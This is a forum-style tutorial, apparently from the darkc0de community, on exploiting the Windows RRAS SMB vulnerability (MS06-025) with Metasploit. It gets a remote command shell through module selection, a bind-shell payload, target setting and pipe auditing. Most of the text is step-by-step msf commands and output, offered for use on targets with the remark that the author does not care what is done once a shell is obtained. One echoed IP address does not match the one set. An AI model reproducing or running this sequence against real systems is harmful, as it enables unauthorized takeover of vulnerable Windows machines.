

Beginning the Journey:

As Per the needs of the darkc0de members, depicting the method to exploit the SMB service using Metasploit. I too have read all about this somewhere sometime back so I compiled it for the members.

In this we will use the RRAS exploit (Patched at MS06-025) along with SMB exploit. Once we get shell I don't care what you do.

So let's get started:

List of commands to see exploits and payloads (If you are not using the GUI one).

```
show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>
```

So command like show exploits would give you something like:

```
msf> show exploits
```

```
Exploits
```

```
=====
```

Name	Description
----	-----
...	
windows/smb/ms04_011_lsass DsRolerUpgradeDownlevelServer Overflow	Microsoft LSASS Service
windows/smb/ms04_031_netdde Overflow	Microsoft NetDDE Service
windows/smb/ms05_039_pnp Overflow	Microsoft Plug and Play Service
windows/smb/ms06_025_rasmans_reg Registry Overflow	Microsoft RRAS Service RASMAN
windows/smb/ms06_025_rras	Microsoft RRAS Service Overflow

So we will use windows/smb/ms06_025_rras.

```
msf> use windows/smb/ms06_025_rras
```

The next line would come as :

```
msf exploit(ms06_025_rras) >
```

As every exploit has some option to set like host, port and some other stuff if you have used the GUI version

```
msf exploit(ms06_025_rras) > show options
```

Name	Current	Setting	Required	Description
RHOST			yes	The target address
RPORT		445	yes	Set the SMB service port
SMBPIPE	ROUTER		yes	The pipe name to use (ROUTER, SRVSVC)

This exploit requires a target address, the port number SMB (server message block) uses to listen, and the name of the pipe exposing this functionality.

```
msf exploit(ms06_025_rras) > set RHOST 192.168.0.1  
RHOST => 192.168.0.1
```

```
msf exploit(ms06_025_rras) > show payloads
```

Compatible payloads

=====

```
...  
windows/shell_bind_tcp           Windows Command Shell, Bind TCP Inline  
windows/shell_bind_tcp_xpfpw    Windows Disable Windows ICF, Command  
Shell, Bind TCP Inline  
windows/shell_reverse_tcp       Windows Command Shell, Reverse TCP  
Inline
```

Here we see three payloads, each of which can be used to load an inline command shell. The use of the word “inline” here means the command shell is set up in one roundtrip. The alternative is “staged” payloads, which fit into a smaller buffer but require an additional network roundtrip to set up. Due to the nature of some vulnerability, buffer space in the exploit is at a premium and a staged exploit is a better option.

```
msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_bind_tcp  
PAYLOAD => windows/shell_bind_tcp  
msf exploit(ms06_025_rras) > show options
```

Module		options:		
Name	Current	Setting	Required	Description
RHOST	192.168.0.1		yes	The target address
RPORT		445	yes	Set the SMB service port
SMBPIPE		ROUTER	yes	The pipe name to use (ROUTER,
SRVSVC)				

Payload options:

Name	Current	Setting	Required	Description
EXITFUNC		thread	yes	Exit technique: seh, thread, process
LPORT	4444		yes	The local port

The exploit and payload are both set. Next we need to set a target type. Metasploit has some generic exploits that work on all platforms, but for others you'll need to specify a target operating system.

```
msf exploit(ms06_025_rras) > show targets
```

Exploit targets:

Id	Name
0	Windows 2000 SP4
1	Windows XP SP1

```
msf exploit(ms06_025_rras) > set TARGET 1
TARGET => 1
```

Lets Exploit it..!!

```
msf exploit(ms06_025_rras) > exploit
```

```
[*] Started bind handler
```

```
[-] Exploit failed: Login Failed: The SMB server did not reply to our request
```

If you see the info of this exploit it you would come to know why I failed would come as This module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.

We can see the PIPE has been set to ROUTER which is not true.

Well metasploit does this too for us, it check which pipes are running on he remote host.

From the Auxiliary we will use the PIPE auditor to see which PIPE the remote host is running.

```
msf exploit(ms06_025_rras) > use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
```

Module options:

Name	Current	Setting	Required	Description
RHOSTS			yes	The target address range or CIDR
Identifier				

```
msf auxiliary(pipe_auditor) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.1.220
msf auxiliary(pipe_auditor) > exploit
[*] Pipes: \netlogon, \lsarpc, \samr, \epmapper, \srvsvc, \wkssvc
[*] Auxiliary module execution completed
```

This tell that the srvsvc PIPE is running on the remote host .

So we just need to use some more command to set the PIPE

```
msf auxiliary(pipe_auditor) > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_025_rras) > exploit
```

You can enjoy the shell now (of course if vulnerable) and do the stuff.

* Keep one thing in your mind , first the machine should be vulnerable to RRAS vulnerability and secondly machine firewall needs to be off.